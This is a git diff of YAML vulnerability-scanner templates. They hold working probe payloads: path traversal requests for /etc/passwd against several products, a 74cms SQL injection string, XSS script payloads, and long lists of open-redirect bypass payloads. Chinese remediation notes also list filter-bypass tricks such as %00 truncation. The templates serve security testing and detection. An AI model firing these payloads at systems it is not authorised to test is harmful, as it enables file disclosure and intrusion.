0.8.6.6存在路径遍历漏洞,该漏洞允许远程攻击者通过wpv-image参数读取系统中的任意文件。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.org/plugins/ - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' + method: GET diff --git a/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml b/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml index f588029977..b03298d776 100644 --- a/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml +++ b/poc/local_file_inclusion/xerox-efi-lfi-11681.yaml @@ -1,18 +1,14 @@ id: xerox-efi-lfi info: - name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion + name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Arbitrary File Disclosure author: gy741 severity: high - description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. + description: Input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php - https://packetstormsecurity.com/files/145570 - https://www.exploit-db.com/exploits/43398/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: iot,xerox,disclosure,lfi requests: @@ -29,5 +25,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml b/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml index 309317c0f8..160af2e5cc 100644 --- a/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml +++ b/poc/local_file_inclusion/yishaadmin-lfi-11744.yaml @@ -1,33 +1,23 @@ id: yishaadmin-lfi - info: - name: yishaadmin - Local File Inclusion + name: yishaadmin path traversal author: Evan Rubinstein severity: high - description: yishaadmin is vulnerable to local file inclusion via the "/admin/File/DownloadFile" endpoint and allows files to be downloaded, read or deleted without any authentication. + description: An endpoint in yshaadmin "/admin/File/DownloadFile" was improperly secured, allowing for files to be downloaded, read or deleted without any authentication. reference: - https://huntr.dev/bounties/2acdd87a-12bd-4ce4-994b-0081eb908128/ - https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: lfi,yishaadmin - requests: - raw: - | GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - - type: status status: - 200 - -# Enhanced by mp on 2022/08/04 diff --git a/poc/magento/magento-admin-panel-8693.yaml b/poc/magento/magento-admin-panel-8693.yaml index 430459bb83..ebf1bb1afe 100644 --- a/poc/magento/magento-admin-panel-8693.yaml +++ b/poc/magento/magento-admin-panel-8693.yaml @@ -4,9 +4,8 @@ info: author: TechbrunchFR severity: info description: As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access. - reference: - - https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html - tags: magento,panel + reference: https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html + tags: magento requests: - method: GET path: diff --git a/poc/magento/magento-cacheleak-8696.yaml b/poc/magento/magento-cacheleak-8696.yaml index 87c5065a7e..6b43d14bf6 100644 --- a/poc/magento/magento-cacheleak-8696.yaml +++ b/poc/magento/magento-cacheleak-8696.yaml @@ -12,12 +12,11 @@ info: - https://www.acunetix.com/vulnerabilities/web/magento-cacheleak/ - https://royduineveld.nl/magento-cacheleak-exploit/ metadata: - max-request: 1 verified: true shodan-query: http.component:"Magento" tags: magento -http: +requests: - method: GET path: - '{{BaseURL}}/var/resource_config.json' diff --git a/poc/magento/magento-config.yaml b/poc/magento/magento-config.yaml index abf80cc0fe..e9c31fe08f 100644 --- a/poc/magento/magento-config.yaml +++ b/poc/magento/magento-config.yaml @@ -4,25 +4,21 @@ info: author: geeknik severity: medium tags: config,exposure - requests: - method: GET path: - "{{BaseURL}}/app/etc/local.xml" - "{{BaseURL}}/store/app/etc/local.xml" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "text/xml" part: header - - type: word words: - "Magento" - part: body \ No newline at end of file + part: body diff --git a/poc/microsoft/74cms-sqli-8.yaml b/poc/microsoft/74cms-sqli-8.yaml index 64afb3631a..afd5c1aac4 100644 --- a/poc/microsoft/74cms-sqli-8.yaml +++ b/poc/microsoft/74cms-sqli-8.yaml @@ -1,4 +1,5 @@ id: CVE-2020-22210 + info: name: 74cms - ajax_officebuilding.php SQL Injection author: ritikchaddha @@ -13,16 +14,22 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 + cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:* + epss-score: 0.12933 metadata: + max-request: 1 fofa-query: app="74cms" shodan-query: http.html:"74cms" tags: cve,cve2020,74cms,sqli + variables: num: "999999999" -requests: + +http: - method: GET path: - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' + matchers: - type: word part: body diff --git a/poc/microsoft/Arcms-json_newslist-sqli.yaml b/poc/microsoft/Arcms-json_newslist-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/microsoft/BlueCMS_v1-adjs-sqli.yaml b/poc/microsoft/BlueCMS_v1-adjs-sqli.yaml old mode 100755 new mode 100644 diff --git a/poc/microsoft/IDOR-vuln-params.yaml b/poc/microsoft/IDOR-vuln-params.yaml index aac2423d09..60d26b06fd 100644 --- a/poc/microsoft/IDOR-vuln-params.yaml +++ b/poc/microsoft/IDOR-vuln-params.yaml @@ -1,16 +1,16 @@ -id: idor-vuln-params - -info: - name: detect possible idor parameters - author: mohammed ayadi - severity: info - tags: idor,file,gf - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "(\\?|\\&|\\/)(([a-z0-9]+(-|_)){0,1})(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report)(=|\\/)([0-9]+\\/){0,1}" +id: idor-vuln-params + +info: + name: detect possible idor parameters + author: ayadim + severity: info + tags: file,bbh,bbh-idor,bbh-check1 + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)(\\?|\\&)(((([a-z0-9-_])+(-|_)+))|(-|_))?(id|uuid|user|account|number|order|no|doc|key|email|group|profile|edit|report|username)((=)|(\\/[0-9]+\\/?))" diff --git a/poc/microsoft/JEEWMS-fileRead.yaml b/poc/microsoft/JEEWMS-fileRead.yaml index fee7448e04..0e02876cd7 100644 --- a/poc/microsoft/JEEWMS-fileRead.yaml +++ b/poc/microsoft/JEEWMS-fileRead.yaml @@ -1,12 +1,10 @@ id: JEEWMS-fileRead - info: name: JEEWMS 系统 showOrDownByurl.do 文件 down 参数本地文件包含漏洞(CNVD-2020-61972) author: Str1am severity: high reference: https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/JEEWMS%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md tags: JEEWMS,fileRead - requests: - method: GET path: diff --git a/poc/microsoft/aims-password-mgmt-client.yaml b/poc/microsoft/aims-password-mgmt-client.yaml index a178296f3f..c6f768a5c9 100644 --- a/poc/microsoft/aims-password-mgmt-client.yaml +++ b/poc/microsoft/aims-password-mgmt-client.yaml @@ -3,8 +3,16 @@ id: aims-password-mgmt-client info: name: Aims Password Management Client Detect author: iamthefrogy + description: An Aims Password management client was detected. severity: info tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -15,3 +23,5 @@ requests: - type: word words: - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/poc/microsoft/aims-password-portal-222.yaml b/poc/microsoft/aims-password-portal-222.yaml index eb21d8e0eb..800dd21cad 100644 --- a/poc/microsoft/aims-password-portal-222.yaml +++ b/poc/microsoft/aims-password-portal-222.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6576 - tags: panel + tags: panel,aims requests: - method: GET diff --git a/poc/microsoft/bems-api-lfi.yaml b/poc/microsoft/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 --- a/poc/microsoft/bems-api-lfi.yaml +++ b/poc/microsoft/bems-api-lfi.yaml @@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/microsoft/chamilo-lms-xss.yaml b/poc/microsoft/chamilo-lms-xss.yaml index 197aece45e..ad8b95d717 100644 --- a/poc/microsoft/chamilo-lms-xss.yaml +++ b/poc/microsoft/chamilo-lms-xss.yaml @@ -1,8 +1,8 @@ -id: chamilo-lms-xss-1 +id: chamilo-lms-xss info: name: Chamilo LMS Cross Site Scripting - author: geeknik + author: nithissh severity: medium description: https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/ tags: xss,chamilo diff --git a/poc/microsoft/cisco-systems-login.yaml b/poc/microsoft/cisco-systems-login.yaml index 25607b3bbf..96ae7b9ee4 100644 --- a/poc/microsoft/cisco-systems-login.yaml +++ b/poc/microsoft/cisco-systems-login.yaml @@ -2,11 +2,12 @@ id: cisco-systems-login info: name: Cisco Systems Login - author: dhiyaneshDk + author: dhiyaneshDk,idealphase severity: info - tags: panel,cisco metadata: - shodan-query: 'http.title:"Cisco Systems Login"' + shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" + tags: panel,cisco requests: - method: GET @@ -18,8 +19,14 @@ requests: - type: word part: body words: - - "Cisco Systems Login" + - "Cisco Systems Login" - type: status status: - 200 + + extractors: + - type: regex + group: 1 + regex: + - '' part: body - - type: status status: - 200 - - type: word words: - 'Content-Type: text/html' - part: header \ No newline at end of file + part: header diff --git a/poc/netlify/netlify-takeover-9042.yaml b/poc/netlify/netlify-takeover-9042.yaml index 17ceeb0180..973635bbcd 100644 --- a/poc/netlify/netlify-takeover-9042.yaml +++ b/poc/netlify/netlify-takeover-9042.yaml @@ -1,11 +1,10 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial,pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,netlify + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: @@ -14,8 +13,8 @@ requests: matchers: - type: word words: - - "Not found - Request ID:" + - "Not Found" - type: word words: - - "Netlify" + - "server: Netlify" part: header diff --git a/poc/nginx/nginx-config.yaml b/poc/nginx/nginx-config.yaml index 9975df4454..ef568764c1 100644 --- a/poc/nginx/nginx-config.yaml +++ b/poc/nginx/nginx-config.yaml @@ -1,29 +1,21 @@ id: nginx-config - info: name: Nginx Config file disclosure - author: sheikhrishad,geeknik + author: sheikhrishad severity: info tags: config,exposure,nginx - requests: - method: GET path: - "{{BaseURL}}/nginx.conf" - matchers-condition: and matchers: - - type: word - words: - - "html>" - negative: true - type: word words: - "server" - "listen" - "server_name" condition: and - - type: status status: - 200 diff --git a/poc/nginx/nginx-module-vts-xss-9108.yaml b/poc/nginx/nginx-module-vts-xss-9108.yaml index 61c9ee43e6..4057382928 100644 --- a/poc/nginx/nginx-module-vts-xss-9108.yaml +++ b/poc/nginx/nginx-module-vts-xss-9108.yaml @@ -1,41 +1,18 @@ id: nginx-module-vts-xss - info: - name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting - author: madrobot,j4vaovo - severity: high - description: Nginx Virtual Host Traffic Status Module contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks. - reference: - - https://github.com/vozlt/nginx-module-vts - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 - metadata: - max-request: 2 - tags: nginx,xss,status - -http: - - raw: - - | - GET /_404_%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - - | - GET /status%3E%3Cscript%3Ealert(7331)%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - + name: Nginx virtual host traffic status module XSS + author: madrobot + severity: medium +requests: + - method: GET + path: + - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E" matchers-condition: and matchers: - - type: dsl - dsl: - - "status_code_2 == 200" - - "contains(header_2, 'text/html')" - - "contains(tolower(body_2), '')" - condition: and - - - type: dsl - dsl: - - "!contains(tolower(body_1), '')" - condition: and - -# digest: 4a0a00473045022100bef45d36680d708495ed8789f663d812bf77ddc8302ba5453b03064d854396940220096f5be895895b9b295c6e4a0a68259b2606c6b857da24f5b78ecfe880647b7f:922c64590222798bb761d5b6d8e72950 + - type: status + status: + - 200 + - type: word + words: + - "" + part: body diff --git a/poc/nginx/nginx-proxy-manager-9111.yaml b/poc/nginx/nginx-proxy-manager-9111.yaml index 5a960423df..6eaa832afd 100644 --- a/poc/nginx/nginx-proxy-manager-9111.yaml +++ b/poc/nginx/nginx-proxy-manager-9111.yaml @@ -1,15 +1,17 @@ id: nginx-proxy-manager + info: name: Nginx Proxy Manager author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Nginx Proxy Manager" + reference: https://www.shodan.io/search?query=http.title%3A%22Nginx+Proxy+Manager%22 tags: panel,nginx,proxy + requests: - method: GET path: - '{{BaseURL}}/login' + matchers-condition: and matchers: - type: word diff --git a/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml b/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml index d229013dd5..dd6e155d1a 100644 --- a/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml +++ b/poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml @@ -1,24 +1,20 @@ -id: unauthorized-puppet-node-manager - -info: - name: Pupet Node Manager - author: pussycat0x - severity: medium - metadata: - fofa-dork: 'app="puppet-Node-Manager"' - tags: node,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Nodes' - - - type: status - status: - - 200 +id: unauthorized-puppet-node-manager +info: + name: Pupet Node Manager + author: pussycat0x + severity: medium + metadata: + fofa-dork: 'app="puppet-Node-Manager"' + tags: node,misconfig +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - 'Nodes' + - type: status + status: + - 200 diff --git a/poc/open_redirect/dedecms-openredirect.yaml b/poc/open_redirect/dedecms-openredirect.yaml index d00f523db7..75c8bb810b 100644 --- a/poc/open_redirect/dedecms-openredirect.yaml +++ b/poc/open_redirect/dedecms-openredirect.yaml @@ -1,24 +1,24 @@ id: dedecms-openredirect - info: name: DedeCMS Open Redirect author: pikpikcu severity: low - reference: https://blog.csdn.net/ystyaoshengting/article/details/82734888 + reference: + - https://blog.csdn.net/ystyaoshengting/article/details/82734888 + metadata: + verified: true + shodan-query: http.html:"power by dedecms" || title:"dedecms" tags: dedecms,redirect - requests: - method: GET path: - "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo=" - matchers-condition: and matchers: - type: word words: - "Location: https://evil.com" part: header - - type: status status: - 302 diff --git a/poc/open_redirect/netsweeper-open-redirect.yaml b/poc/open_redirect/netsweeper-open-redirect.yaml index 11988b3f68..b1dbdbf43a 100644 --- a/poc/open_redirect/netsweeper-open-redirect.yaml +++ b/poc/open_redirect/netsweeper-open-redirect.yaml @@ -1,17 +1,21 @@ id: netsweeper-open-redirect + info: name: Netsweeper 4.0.9 - Open Redirection author: daffainfo severity: medium description: Netsweeper version 4.0.9 was vulnerable to an Unauthenticated and Authenticated Open Redirect vulnerability. - reference: https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz + reference: + - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz tags: netsweeper,redirect + requests: - method: GET path: - - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://example.com/" + - "{{BaseURL}}/webadmin/authportal/bounce.php?url=https://interact.sh/" + matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' diff --git a/poc/open_redirect/newsletter-open-redirect.yaml b/poc/open_redirect/newsletter-open-redirect.yaml index 986f6ae231..e391d3ecaf 100644 --- a/poc/open_redirect/newsletter-open-redirect.yaml +++ b/poc/open_redirect/newsletter-open-redirect.yaml @@ -1,22 +1,20 @@ id: newsletter-open-redirect + info: - name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect + name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect author: dhiyaneshDk severity: medium - description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the header() PHP function, leading to an open redirect issue. - reference: - - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 - classification: - cwe-id: CWE-601 + description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue. + reference: https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1 tags: wordpress,redirect,wp-plugin,newsletter,wp + requests: - method: GET path: - - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo" + - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ==" + matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/04/13 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 \ No newline at end of file diff --git a/poc/open_redirect/odoo-cms-redirect.yaml b/poc/open_redirect/odoo-cms-redirect.yaml index c16827e2db..f81388034c 100644 --- a/poc/open_redirect/odoo-cms-redirect.yaml +++ b/poc/open_redirect/odoo-cms-redirect.yaml @@ -1,12 +1,10 @@ id: odoo-cms-redirect info: - name: Odoo CMS - Open Redirect + name: Odoo CMS - Open redirection all Version author: 0x_Akoko + description: Odoo CMS - Open redirection all Version. + reference: https://cxsecurity.com/issue/WLB-2021020143 severity: low - description: Odoo CMS - Open redirection in all versions due to Odoo's policy. - reference: - - https://cxsecurity.com/issue/WLB-2021020143 - - https://www.odoo.com/page/security-nonvuln-redirectors tags: odoo,redirect requests: - method: GET diff --git a/poc/open_redirect/open-redirect-9308.yaml b/poc/open_redirect/open-redirect-9308.yaml index 52afa349a8..6a6f5a75ff 100644 --- a/poc/open_redirect/open-redirect-9308.yaml +++ b/poc/open_redirect/open-redirect-9308.yaml @@ -6,112 +6,39 @@ info: description: A user-controlled input redirects users to an external website. tags: redirect,generic requests: - - raw: - - | - GET /{{redirect}} HTTP/1.1 - Host: {{Hostname}} - payloads: - redirect: - - '%0a/interact.sh/' - - '%0d/interact.sh/' - - '%00/interact.sh/' - - '%09/interact.sh/' - - '%5C%5Cinteract.sh/%252e%252e%252f' - - '%5Cinteract.sh' - - '%5cinteract.sh/%2f%2e%2e' - - '%5c{{RootURL}}interact.sh/%2f%2e%2e' - - '../interact.sh' - - '.interact.sh' - - '/%5cinteract.sh' - - '////\;@interact.sh' - - '////interact.sh' - - '///interact.sh' - - '///interact.sh/%2f%2e%2e' - - '///interact.sh@//' - - '///{{RootURL}}interact.sh/%2f%2e%2e' - - '//;@interact.sh' - - '//\/interact.sh/' - - '//\@interact.sh' - - '//\interact.sh' - - '//\tinteract.sh/' - - '//interact.sh/%2F..' - - '//interact.sh//' - - '//%69%6e%74%65%72%61%63%74%2e%73%68' - - '//interact.sh@//' - - '//interact.sh\tinteract.sh/' - - '//https://interact.sh@//' - - '/<>//interact.sh' - - '/\/\/interact.sh/' - - '/\/interact.sh' - - '/\interact.sh' - - '/interact.sh' - - '/interact.sh/%2F..' - - '/interact.sh/' - - '/interact.sh/..;/css' - - '/https:interact.sh' - - '/{{RootURL}}interact.sh/' - - '/〱interact.sh' - - '/〵interact.sh' - - '/ゝinteract.sh' - - '/ーinteract.sh' - - '/ーinteract.sh' - - '<>//interact.sh' - - '@interact.sh' - - '@https://interact.sh' - - '\/\/interact.sh/' - - 'interact%E3%80%82sh' - - 'interact.sh' - - 'interact.sh/' - - 'interact.sh//' - - 'interact.sh;@' - - 'https%3a%2f%2finteract.sh%2f' - - 'https:%0a%0dinteract.sh' - - 'https://%0a%0dinteract.sh' - - 'https://%09/interact.sh' - - 'https://%2f%2f.interact.sh/' - - 'https://%3F.interact.sh/' - - 'https://%5c%5c.interact.sh/' - - 'https://%5cinteract.sh@' - - 'https://%23.interact.sh/' - - 'https://.interact.sh' - - 'https://////interact.sh' - - 'https:///interact.sh' - - 'https:///interact.sh/%2e%2e' - - 'https:///interact.sh/%2f%2e%2e' - - 'https:///interact.sh@interact.sh/%2e%2e' - - 'https:///interact.sh@interact.sh/%2f%2e%2e' - - 'https://:80#@interact.sh/' - - 'https://:80?@interact.sh/' - - 'https://:@\@interact.sh' - - 'https://:@interact.sh\@interact.sh' - - 'https://:@interact.sh\@WillBeReplaced.com' - - 'https://;@interact.sh' - - 'https://\tinteract.sh/' - - 'https://interact.sh/interact.sh' - - 'https://interact.sh/https://interact.sh/' - - 'https://www.\.interact.sh' - - 'https:/\/\interact.sh' - - 'https:/\interact.sh' - - 'https:/interact.sh' - - 'https:interact.sh' - - '{{RootURL}}interact.sh' - - '〱interact.sh' - - '〵interact.sh' - - 'ゝinteract.sh' - - 'ーinteract.sh' - - 'ーinteract.sh' - - '?page=interact.sh&_url=interact.sh&callback=interact.sh&checkout_url=interact.sh&content=interact.sh&continue=interact.sh&continueTo=interact.sh&counturl=interact.sh&data=interact.sh&dest=interact.sh&dest_url=interact.sh&dir=interact.sh&document=interact.sh&domain=interact.sh&done=interact.sh&download=interact.sh&feed=interact.sh&file=interact.sh&host=interact.sh&html=interact.sh&http=interact.sh&https=interact.sh&image=interact.sh&image_src=interact.sh&image_url=interact.sh&imageurl=interact.sh&include=interact.sh&langTo=interact.sh&media=interact.sh&navigation=interact.sh&next=interact.sh&open=interact.sh&out=interact.sh&page=interact.sh&page_url=interact.sh&pageurl=interact.sh&path=interact.sh&picture=interact.sh&port=interact.sh&proxy=interact.sh&redir=interact.sh&redirect=interact.sh&redirectUri=interact.sh&redirectUrl=interact.sh&reference=interact.sh&referrer=interact.sh&req=interact.sh&request=interact.sh&retUrl=interact.sh&return=interact.sh&returnTo=interact.sh&return_path=interact.sh&return_to=interact.sh&rurl=interact.sh&show=interact.sh&site=interact.sh&source=interact.sh&src=interact.sh&target=interact.sh&to=interact.sh&uri=interact.sh&url=interact.sh&val=interact.sh&validate=interact.sh&view=interact.sh&window=interact.sh&redirect_to=interact.sh&ret=interact.sh&r2=interact.sh&img=interact.sh&u=interact.sh&r=interact.sh&URL=interact.sh&AuthState=interact.sh' + - method: GET + path: + - '{{BaseURL}}/example.com/' + - '{{BaseURL}}/example.com//' + - '{{BaseURL}}///;@example.com' + - '{{BaseURL}}///example.com/%2F..' + - '{{BaseURL}}/////example.com' + - '{{BaseURL}}//example.com/%2F..' + - '{{BaseURL}}//example.com/..;/css' + - '{{BaseURL}}/example%E3%80%82com' + - '{{BaseURL}}/%5Cexample.com' + - '{{BaseURL}}/example.com' + - '{{BaseURL}}//example.com/' + - '{{BaseURL}}/%00/example.com/' + - '{{BaseURL}}/%09/example.com/' + - '{{BaseURL}}/%0a/example.com/' + - '{{BaseURL}}/%0d/example.com/' + - '{{BaseURL}}////example.com/%2f%2e%2e' + - '{{BaseURL}}/%5cexample.com/%2f%2e%2e' + - '{{BaseURL}}/{{BaseURL}}example.com' + - '{{BaseURL}}//{{BaseURL}}example.com/' + - '{{BaseURL}}////{{BaseURL}}example.com/%2f%2e%2e' + - '{{BaseURL}}/%5c{{BaseURL}}example.com/%2f%2e%2e' + - '{{BaseURL}}/?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&diexample.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com' + - '{{BaseURL}}/1/_https@example.com' stop-at-first-match: true matchers-condition: and matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header - type: status status: - - 301 - 302 - - 307 - - 308 - condition: or + - 301 diff --git a/poc/open_redirect/otobo-open-redirect-9411.yaml b/poc/open_redirect/otobo-open-redirect-9411.yaml index ef4fc620dc..ca7d3701d7 100644 --- a/poc/open_redirect/otobo-open-redirect-9411.yaml +++ b/poc/open_redirect/otobo-open-redirect-9411.yaml @@ -5,8 +5,8 @@ info: severity: medium description: There is a open redirect vulnerability in Otobo reference: - - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/ - https://github.com/rotheross/otobo + - https://huntr.dev/bounties/de64ac71-9d06-47cb-b643-891db02f2a1f/ tags: redirect,otobo requests: - method: GET @@ -14,6 +14,6 @@ requests: - '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com' matchers: - type: regex - part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 + - 